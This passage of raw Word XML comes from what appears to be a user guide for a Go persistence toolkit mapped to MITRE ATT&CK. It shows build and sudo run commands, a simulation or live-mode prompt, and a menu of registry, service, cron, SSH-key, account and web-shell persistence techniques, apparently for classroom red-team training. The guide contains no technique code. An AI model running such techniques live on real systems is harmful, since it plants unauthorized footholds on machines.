        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x persist_macos_amd64 &amp;&amp; sudo ./persist_macos_amd64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># macOS Apple Silicon (M1/M2/M3/M4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x persist_macos_arm64 &amp;&amp; sudo ./persist_macos_arm64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Disable ANSI color output (pipes, non-terminal logging)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">NO_COLOR=1 ./persist_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="F57F17" w:sz="12" w:space="10"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="F5F7FA" w:val="clear"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F57F17"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator/root privileges unlock system-level techniques (services, systemd, /etc/ paths). Without elevation, user-level techniques still execute and system-level ones show detailed simulation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Building from Source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Requires Go 1.21+  — golang.org/dl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">go version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Build for current platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cd persist/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">go build -o persist .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cross-compile all platforms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GOOS=linux   GOARCH=amd64 go build -ldflags='-s -w' -o persist_linux_amd64 .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GOOS=windows GOARCH=amd64 go build -ldflags='-s -w' -o persist_windows_amd64.exe .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GOOS=darwin  GOARCH=amd64 go build -ldflags='-s -w' -o persist_macos_amd64 .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GOOS=darwin  GOARCH=arm64 go build -ldflags='-s -w' -o persist_macos_arm64 .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># No external dependencies — zero go get required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="520" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B2A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  Using the Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">First Run — Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">On startup, the tool asks two questions: whether to enable simulation mode, and (if live mode is chosen) requires an authorization confirmation. All subsequent choices are made through the numbered menu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo ./persist_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ╔════════════════════════════════════════════════════════════════╗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ║   MITRE ATT&amp;CK  Persistence Toolkit                          ║</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ║   Tactic: TA0003 – Persistence                               ║</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ╚════════════════════════════════════════════════════════════════╝</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ▸ Enable Simulation Mode (no actual system changes) (y/n) [y]:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    → y   (safe for classroom — shows full detail without changes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    → n   (live mode — real changes — requires authorization)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Main Menu Navigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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6360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Menu Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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16 Windows-specific techniques — registry, services, WMI, COM, SSP...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux / macOS Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6 techniques — systemd, cron, shell profiles, RC scripts, launchd...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6 techniques — SSH keys, accounts, web shells, browser extensions...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Run All Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Execute entire suite with default or custom payload path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique Catalog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Browse all techniques with IOCs and detection notes, filter by platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
